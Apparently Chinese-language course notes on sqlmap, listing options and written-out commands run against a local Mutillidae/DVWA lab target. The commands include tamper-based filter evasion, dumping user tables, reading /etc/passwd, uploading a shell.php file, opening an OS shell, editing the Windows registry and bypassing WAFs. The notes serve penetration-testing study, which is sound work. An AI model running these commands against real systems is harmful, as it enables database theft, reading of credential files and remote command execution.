伪静态页面不能注入,这是错误的!
SQLMAP自动注入08-----ENUMERATION
--current-user
--current-db
--hostname
--users
--privileges -U username (CU当前账号)
--roles
--dbs
--tables,--exclude-sysdbs -D dvwa
-T user -D dvwa -C user --columns
root@R:~# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p "user-agent,username" --tamper="tamper/between.py,tamper/randomcase.py,tamper/space?comment.py" -v 3 --current-user
root@R:~# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p "user-agent,username" --tamper="tamper/between.py,tamper/randomcase.py,tamper/space?comment.py" -v 3 --user
root@R:~# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p "user-agent,username" --tamper="tamper/between.py,tamper/randomcase.py,tamper/space?comment.py" -v 3 --privileges -U guest
root@R:~# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p "user-agent,username" --tamper="tamper/between.py,tamper/randomcase.py,tamper/space?comment.py" -v 3 --roles
root@R:~# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p "user-agent,username" --tamper="tamper/between.py,tamper/randomcase.py,tamper/space?comment.py" -v 3 --dbs
root@R:~# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p "user-agent,username" --tamper="tamper/between.py,tamper/randomcase.py,tamper/space?comment.py" -v 3 -D dvwa --table
root@R:~# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p "user-agent,username" --tamper="tamper/between.py,tamper/randomcase.py,tamper/space?comment.py" -v 3 -D dvwa -T users --columns
root@R:~# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p "user-agent,username" --tamper="tamper/between.py,tamper/randomcase.py,tamper/space?comment.py" -v 3 -D dvwa -T users --count
SQLMAP自动注入08-----ENUMERATION
--schema --batch --exclude-sysdbs 元数据(使用默认选项)
--count
Dump数据
--dump,-C,-T,-D,--start,--stop
--dump-all --exclude-sysdbs
--sql-query "select * from users"
root@R:~# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p "user-agent,username" --tamper="tamper/between.py,tamper/randomcase.py,tamper/space?comment.py" -v 3 --schema --batch --exclude-sysdbs
root@R:~# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p "user-agent,username" --tamper="tamper/between.py,tamper/randomcase.py,tamper/space?comment.py" -v 3 -D dvwa -T users --dump
root@R:~# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p "user-agent,username" --tamper="tamper/between.py,tamper/randomcase.py,tamper/space?comment.py" -v 3 -D dvwa -T users --dump-all
root@R:~# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p "user-agent,username" --sql-query "select * from users"
SQLMAP自动注入09-----BRUTE FORCE
Mysql<5.0,没有information_schema库
Mysql>=5.0,但无权读取information_schema库
微软的access数据库,默认无权读取MSysObjects库
--common-tables
--common-columns (Access系统表无列信息)
root@R:~# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" --common-tables
SQLMAP自动注入10-----UDF INJECTION
--udf-inject,--shared-lib
编译共享库创建并上传至DB Server,以此生成UDF实现高级注入
Linux: shared object
Windows: DLL
http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-
full-control-whitepaper-4633857
SQLMAP自动注入11-----FILE SYSTEM
--file-read="/etc/passwd"
--file-write="shell.php" --file-dest"/tmp/shell.php"
root@R:~# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p "user-agent,username" --file-read="/etc/passwd"
root@R:~# cd /root/.sqlmap/output/192.168.1.115
root@R:/.sqlmap/output/192.168.1.115# ls
dump files log session.sqlite target.txt
root@R:/.sqlmap/output/192.168.1.115# cd files/
root@R:/.sqlmap/output/192.168.1.115/files# ls
_etc_passwd
root@R:/.sqlmap/output/192.168.1.115/files# cat _etc_passwd
root@R:~# vi shell.php
root@R:~# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p "user-agent,username" --file-write="shell.php" --file-dest="/tmp/shell.php"
SQLMAP自动注入12-----OS
Mysql、postgresql
上传共享库并生成sys_exec()、sys_eval()两个UDF
Mssql
xp_cmdshell存储过程(有九用,禁了启,没有键)
--sql-shell
--os-shell
--os-cmd
root@R:~# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p "user-agent,username" --os-cmd
root@R:~# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p "user-agent,username" --os-shell
root@R:~# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p "user-agent,username" --sql-shell
SQLMAP自动注入13-----WINDOWS REGISTORY
--reg-read
--reg-add
--reg-del
--reg-key、--reg-value、--reg-data、--reg-type
sqlmap.py -u="http://1.1.1.1/a.php?id=1 --reg-add\ --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG-SZ --reg-data=1
SQLMAP自动注入14-----GENERAL
-s: sqlite会话文件保存位置
-t: 记录流浪文件保存位置
--charset: 强制字符编码
--charset=GBK
--crawl: 从起始位置爬站深度
--batch --crawl=3
--csv-del: dump数据默认存于","分割的CSV文件中,指定其他分隔符
--csv-del=";"
--dbms-cred: 指定数据库账号
SQLMAP自动注入14-----GENERAL
--flush-session: 清空session
--force-ssl
--fresh-queries: 忽略session查询结果
--hex: dump非ASCII字符内容时,将其编码为16进制形式,收到后解码还原
sqlmap -u "http://1.1.1.1/s.php?id=1" --hex -v 3
--output-dir=/tmp
--parse-error: 分析和现实数据库内建报错信息
sqlmap -u "http://1.1.1.1/sqlmap/a.php?id=1" --parse-errors
--save: 将命令保存成配置文件
root@R:~# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p "user-agent,username" --dbs --fresh-queries --save
SQLMAP自动注入15-----MISCELLANEOUS
-z: 参数助记符
sqlmap --batch --random-agent --ignore-proxy --technique=BEU -u
"1.1.1.1/a.php?id=1"
sqlmap -z "bat,randcma,ign,tec=BEU" -u "1.1.1.1/a.php?id=1"
sqlmap -ignore-proxy --flush-session --technique=U --dump -D testdb -
T user -u "1.1.1.1/a.php?id=1"
sqlmap -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u
"1.1.1.1/vuln.php?id=1"
SQLMAP自动注入15-----MISCELLANEOUS
--answer
sqlmap -u "http://1.1.1.1/a.php?id=1" --technique=E --
answers="extending=N" --batch
--check-waf: 检测WAF/IPS/IDS
--hpp: HTTP parameter pollution
绕过WAF/IPS/IDS的有效方法
尤其对ASP/ISS 和 ASP.NET/IIS
--identify-waf: 彻底的waf/ips/ids检查
支持30多种产品
SQLMAP自动注入15-----MISCELLANEOUS
--mobile: 模拟智能手机设备
--purge-output: 清楚output文件夹
--smart: 当有大量检测目标时,只选择基于错误的检测结果
--wizard: 向导